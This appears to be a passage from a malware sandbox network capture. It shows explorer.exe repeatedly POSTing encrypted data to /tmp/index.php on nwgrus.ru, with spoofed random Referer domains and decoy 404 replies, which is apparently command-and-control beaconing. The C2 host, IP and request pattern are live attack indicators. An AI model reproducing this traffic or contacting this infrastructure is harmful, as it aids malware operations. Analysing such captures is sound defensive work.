Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49748	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:27:51.789321899 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nsmlwxtdmapgbt.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 204 Host: nwgrus.ru
Oct 12, 2024 23:27:51.789339066 CEST	204	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 2e 2a da be Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vu.*q:wgT \-coq]/n[?Hto2Wx5-n~2x9xTnhk0
Oct 12, 2024 23:27:53.491604090 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:27:52 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49749	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:27:53.499587059 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mgjceopkpxepxsq.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 213 Host: nwgrus.ru
Oct 12, 2024 23:27:53.499623060 CEST	213	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 5a 38 c3 91 Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vuZ8ZPMo{Kr@Ng8z@#ahwUS(f[D&]6HW:/t(mx8QOAL.m
Oct 12, 2024 23:27:54.871311903 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:27:54 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49750	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:27:54.879584074 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://oftgcfgbliielxad.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 313 Host: nwgrus.ru
Oct 12, 2024 23:27:54.879584074 CEST	313	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 4d 49 ff 8c Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vuMI,URwz`3'j%Ms#/u)#m]4^%+hTDNW0`t:p:M"<g,*W3GAX.>s
Oct 12, 2024 23:27:56.259181023 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:27:55 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49751	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:27:56.555217981 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://drvjksfgomsvmny.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 269 Host: nwgrus.ru
Oct 12, 2024 23:27:56.555231094 CEST	269	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 5f 5d a7 95 Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vu_]`B`?WN&J{rt]UTD^+1n,@7\|Q9AyA@-;K_zr@.$\+"5EPZRl6RCk
Oct 12, 2024 23:27:57.930603027 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:27:57 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49752	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:27:57.939685106 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ecoqiraysyfcwnbl.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 344 Host: nwgrus.ru
Oct 12, 2024 23:27:57.939718008 CEST	344	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 4d 17 d2 8a Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vuM@zhI;R,qFhO}-mMP2~B _\|]1i0/8aW,&J#`#fy_Y`An:46
Oct 12, 2024 23:27:59.333549976 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:27:59 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49753	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:27:59.394874096 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://evxjlpqlxbs.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 248 Host: nwgrus.ru
Oct 12, 2024 23:27:59.394901991 CEST	248	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 76 5d c9 e5 Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vuv]hKoh7Y)>ZWZV;5U:!IAcrZU~{JGr/[w/`(Vp1&zPD/k2E+
Oct 12, 2024 23:28:00.782381058 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:28:00 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49760	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:28:00.791733980 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://icaimrqjtfta.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 304 Host: nwgrus.ru
Oct 12, 2024 23:28:00.791764021 CEST	304	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 2a 1f cf a3 Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vu*wc%1tU(;4?1mi}KE@A-ROxP%LJT1\./+<KS:dcf#y8]DB
Oct 12, 2024 23:28:02.175883055 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:28:01 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49772	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:28:02.185267925 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ulydvxuenfbpuxu.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 234 Host: nwgrus.ru
Oct 12, 2024 23:28:02.185295105 CEST	234	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 54 4a c1 86 Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vuTJ3sDhi[/9 (af&r.V`]0M7}c^X,=4hDk5%6C5'v!Exum'0
Oct 12, 2024 23:28:03.567646027 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:28:03 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49778	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:28:03.579154968 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gvahueqnuehjgw.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 117 Host: nwgrus.ru
Oct 12, 2024 23:28:03.579154968 CEST	117	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 52 1e e7 fa Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vuRN?f=2f )vq
Oct 12, 2024 23:28:04.963047028 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:28:04 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49789	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:28:04.973149061 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tfjoxhiuawit.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 311 Host: nwgrus.ru
Oct 12, 2024 23:28:04.973164082 CEST	311	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 41 41 f9 a7 Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vuAA)Rg!pLv,Pe*7SP;;tE[P1],Y1Y!mGZ=,lAR.T;(xUl(;xx{J-o
Oct 12, 2024 23:28:06.354466915 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:28:06 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49800	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:28:06.390017986 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fveqebbshittyfl.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 262 Host: nwgrus.ru
Oct 12, 2024 23:28:06.390919924 CEST	262	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 40 30 c6 ec Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vu@0yEMxyq6,\|y*AC,1o;.:A/~l=92\$m@}_-TX5K?o"m$RGD"'+u3;_
